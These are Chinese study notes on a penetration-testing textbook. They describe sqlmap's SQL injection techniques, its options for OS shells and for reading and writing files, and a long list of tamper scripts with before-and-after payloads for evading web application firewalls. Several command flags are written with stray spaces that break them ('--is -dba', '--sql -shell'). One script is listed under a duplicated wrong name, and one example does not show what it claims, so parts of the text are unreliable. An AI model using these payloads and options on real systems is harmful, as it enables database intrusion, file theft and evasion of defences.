Web安全攻防 滲透測試實戰指南   學習筆記 （二）

 

第二章  漏洞環境及實踐

 

 

這里的環境就不一一介紹了，在后續實驗中如果用到的話，我們再詳細講解搭建過程~

 

 

第三章  常用的滲透測試工具

 

 

 

• Sqlmap

                              自動化的sql注入工具。

1.主要功能：掃描、發現、利用給定的url的sql注入漏洞，內置許多繞過插件。

 

2.支持的數據庫：mysql、oracle、sql server、access、DB2、sqlite、postgresql、Firebird、sybase、sap maxDB。

 

3.采用5種注入技術：

 

[1]基於布爾的盲注：根據返回頁面判斷條件真假

[2]基於時間的盲注：使用條件語句查看時間延遲語句是否執行（頁面返回時間是否增加）

[3]基於報錯注入：返回錯誤信息，或將注入語句的結果返回頁面中

[4]聯合查詢注入：在允許使用union的情況下注入

[5]堆查詢注入：同時執行多條語句注入

 

 

4.用法

 

（1）對於簡單的sqlmap用法，本人已經在此篇文章中進行說明

 

https://www.cnblogs.com/0yst3r-2046/p/10957616.html

 

 

（2）進階的sqlmap用法（參數講解）

 

1>探測等級： --level 5

 

--level 5 指的是需要執行的測試等級

 

一共有5個等級（1-5） 不加 level 時，默認是1

5級包含的payload最多，會自動破解出cookie、XFF等頭部注入，相對應他的速度也比較慢。

 

level=2 http cookie會測試

level=3 http user-agent/referer頭會測試

 

在不能確定哪個payload或參數為注入點時，建議使用高的level值。

 

2>當前用戶是否為管理權限： --is -dba

 

返回true則為是管理權限，否則不是

 

3>列出數據庫管理員角色： --roles

 

注意：只適用於當前數據庫是oracle的時候

 

4>HTTP Referer頭: --referer

 

當level設置為3時，會嘗試referer注入

 

也可以使用referer命令來欺騙 例如：

--referer 域名（https://www.baidu.com）

 

5>運行自定義sql語句：--sql -shell

 

例如：sqlmap.py -u “http://192.168.1.xxx/sql1/union.php?id=1” --sql -shell

 

 

6>運行任意操作系統命令： --os -cmd  

                                           --os -shell

 

 

用 --os -shell參數可以模擬一個真實的shell，輸入想執行的命令

支持asp、asp.net、jsp、php四種語言

 

7>從數據庫服務器中讀取文件  --file-read    ” 路徑“

 

 

8>上傳文件到數據庫服務器中  --file-write

                                                --file-dest

 

用於寫入本地文件到服務器中，當數據庫為mysql、postgresql、microsoft sql server，且當前用戶有權限使用特定函數時，上傳的文件可以是文本也可以是二進制文件。

 

 

 

6.sqlmap自帶繞過腳本tamper的講解

 

sqlmap在默認情況下除了使用char()函數防止出現單引號，沒有對注入的數據進行修改。

tamper參數對數據做修改來繞過WAF等設備，其中大部分腳本主要用正則模塊替換攻擊載荷字符編碼的方式嘗試繞過WAF的檢測規則。

 

常用的tamper腳本：

 

apostrophemask.py

適用數據庫：ALL 

作用：將引號替換為utf-8，用於過濾單引號 

使用腳本前：tamper("1 AND '1'='1") 

使用腳本后：1 AND %EF%BC%871%EF%BC%87=%EF%BC%871

 

base64encode.py

適用數據庫：ALL 

作用：替換為base64編碼 

使用腳本前：tamper("1' AND SLEEP(5)#") 

使用腳本后：MScgQU5EIFNMRUVQKDUpIw==

 

multiplespaces.py

適用數據庫：ALL 

作用：圍繞sql關鍵字添加多個空格 

使用腳本前：tamper('1 UNION SELECT foobar') 

使用腳本后：1 UNION SELECT foobar

 

space2plus.py

適用數據庫：ALL 

作用：用加號替換空格 

使用腳本前：tamper('SELECT id FROM users') 

使用腳本后：SELECT+id+FROM+users

 

nonrecursivereplacement.py

適用數據庫：ALL 

作用：作為雙重查詢語句，用雙重語句替代預定義的sql關鍵字（適用於非常弱的自定義過濾器，例如將select替換為空） 

使用腳本前：tamper('1 UNION SELECT 2--') 

使用腳本后：1 UNIOUNIONN SELESELECTCT 2--

 

space2randomblank.py

適用數據庫：ALL 

作用：將空格替換為其他有效字符 

使用腳本前：tamper('SELECT id FROM users') 

使用腳本后：SELECT%0Did%0DFROM%0Ausers

 

unionalltounion.py

適用數據庫：ALL 

作用：將union allselect 替換為unionselect 

使用腳本前：tamper('-1 UNION ALL SELECT') 

使用腳本后：-1 UNION SELECT

 

securesphere.py

適用數據庫：ALL 

作用：追加特定的字符串 

使用腳本前：tamper('1 AND 1=1') 

使用腳本后：1 AND 1=1 and '0having'='0having'

 

space2dash.py

適用數據庫：ALL 

作用：將空格替換為--，並添加一個隨機字符串和換行符 

使用腳本前：tamper('1 AND 9227=9227') 

使用腳本后：1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227

 

space2mssqlblank.py

適用數據庫：Microsoft SQL Server 

測試通過數據庫：Microsoft SQL Server 2000、Microsoft SQL Server 2005 

作用：將空格隨機替換為其他空格符號('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A') 

使用腳本前：tamper('SELECT id FROM users') 

使用腳本后：SELECT%0Eid%0DFROM%07users

 

between.py

測試通過數據庫：Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0 

作用：用NOT BETWEEN 0 AND #替換> 

使用腳本前：tamper('1 AND A > B--') 

使用腳本后：1 AND A NOT BETWEEN 0 AND B--

 

percentage.py

適用數據庫：ASP 

測試通過數據庫：Microsoft SQL Server 2000, 2005、MySQL 5.1.56, 5.5.11、PostgreSQL 9.0 

作用：在每個字符前添加一個% 

使用腳本前：tamper('SELECT FIELD FROM TABLE') 

使用腳本后：%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

 

sp_password.py

適用數據庫：MSSQL 

作用：從T-SQL日志的自動迷糊處理的有效載荷中追加sp_password 

使用腳本前：tamper('1 AND 9227=9227-- ') 

使用腳本后：1 AND 9227=9227-- sp_password

 

charencode.py

測試通過數據庫：Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0 

作用：對給定的payload全部字符使用url編碼（不處理已經編碼的字符） 

使用腳本前：tamper('SELECT FIELD FROM%20TABLE') 

使用腳本后：%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45

 

randomcase.py

測試通過數據庫：Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0 

作用：隨機大小寫 

使用腳本前：tamper('INSERT') 

使用腳本后：INseRt

 

charunicodeencode.py

適用數據庫：ASP、ASP.NET 

測試通過數據庫：Microsoft SQL Server 2000/2005、MySQL 5.1.56、PostgreSQL 9.0.3 

作用：適用字符串的unicode編碼 

使用腳本前：tamper('SELECT FIELD%20FROM TABLE') 

使用腳本后：%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045

 

space2comment.py

測試通過數據庫：Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0 

作用：將空格替換為/**/ 

使用腳本前：tamper('SELECT id FROM users') 

使用腳本后：SELECT/**/id/**/FROM/**/users

 

equaltolike.py

測試通過數據庫：Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5 

作用：將=替換為LIKE 

使用腳本前：tamper('SELECT * FROM users WHERE id=1') 

使用腳本后：SELECT * FROM users WHERE id LIKE 1

 

equaltolike.py

測試通過數據庫：MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0 

作用：將>替換為GREATEST，繞過對>的過濾 

使用腳本前：tamper('1 AND A > B') 

使用腳本后：1 AND GREATEST(A,B+1)=A

 

ifnull2ifisnull.py

適用數據庫：MySQL、SQLite (possibly)、SAP MaxDB (possibly) 

測試通過數據庫：MySQL 5.0 and 5.5 

作用：將類似於IFNULL(A, B)替換為IF(ISNULL(A), B, A)，繞過對IFNULL的過濾 

使用腳本前：tamper('IFNULL(1, 2)') 

使用腳本后：IF(ISNULL(1),2,1)

 

modsecurityversioned.py

適用數據庫：MySQL 

測試通過數據庫：MySQL 5.0 

作用：過濾空格，使用mysql內聯注釋的方式進行注入 

使用腳本前：tamper('1 AND 2>1--') 

使用腳本后：1 /*!30874AND 2>1*/--

 

space2mysqlblank.py

適用數據庫：MySQL 

測試通過數據庫：MySQL 5.1 

作用：將空格替換為其他空格符號('%09', '%0A', '%0C', '%0D', '%0B') 

使用腳本前：tamper('SELECT id FROM users') 

使用腳本后：SELECT%0Bid%0DFROM%0Cusers

 

modsecurityzeroversioned.py

適用數據庫：MySQL 

測試通過數據庫：MySQL 5.0 

作用：使用內聯注釋方式（/*!00000*/）進行注入 

使用腳本前：tamper('1 AND 2>1--') 

使用腳本后：1 /*!00000AND 2>1*/--

 

space2mysqldash.py

適用數據庫：MySQL、MSSQL 

作用：將空格替換為 -- ，並追隨一個換行符 

使用腳本前：tamper('1 AND 9227=9227') 

使用腳本后：1--%0AAND--%0A9227=9227

 

bluecoat.py

適用數據庫：Blue Coat SGOS 

測試通過數據庫：MySQL 5.1,、SGOS 

作用：在sql語句之后用有效的隨機空白字符替換空格符，隨后用LIKE替換= 

使用腳本前：tamper('SELECT id FROM users where id = 1') 

使用腳本后：SELECT%09id FROM users where id LIKE 1

 

versionedkeywords.py

適用數據庫：MySQL 

測試通過數據庫：MySQL 4.0.18, 5.1.56, 5.5.11 

作用：注釋繞過 

使用腳本前：tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#') 

使用腳本后：1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#

 

halfversionedmorekeywords.py

適用數據庫：MySQL < 5.1 

測試通過數據庫：MySQL 4.0.18/5.0.22 

作用：在每個關鍵字前添加mysql版本注釋 

使用腳本前：tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa") 

使用腳本后：value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa

 

space2morehash.py

適用數據庫：MySQL >= 5.1.13 

測試通過數據庫：MySQL 5.1.41 

作用：將空格替換為#，並添加一個隨機字符串和換行符 

使用腳本前：tamper('1 AND 9227=9227') 

使用腳本后：1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227

 

apostrophenullencode.py

適用數據庫：ALL 

作用：用非法雙字節Unicode字符替換單引號 

使用腳本前：tamper("1 AND '1'='1") 

使用腳本后：1 AND %00%271%00%27=%00%271

 

appendnullbyte.py

適用數據庫：ALL 

作用：在有效載荷的結束位置加載null字節字符編碼 

使用腳本前：tamper('1 AND 1=1') 

使用腳本后：1 AND 1=1%00

 

chardoubleencode.py

適用數據庫：ALL 

作用：對給定的payload全部字符使用雙重url編碼（不處理已經編碼的字符） 

使用腳本前：tamper('SELECT FIELD FROM%20TABLE') 

使用腳本后：%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545

 

unmagicquotes.py

適用數據庫：ALL 

作用：用一個多字節組合%bf%27和末尾通用注釋一起替換空格 

使用腳本前：tamper("1' AND 1=1") 

使用腳本后：1%bf%27 AND 1=1--

 

randomcomments.py

適用數據庫：ALL 

作用：用注釋符分割sql關鍵字 

使用腳本前：tamper('INSERT') 

使用腳本后：I/**/N/**/SERT

 

 

 

 

https://blog.csdn.net/a_small_rabbit/article/details/101110011 

 

 參考資料：

《Web安全攻防 滲透測試實戰指南》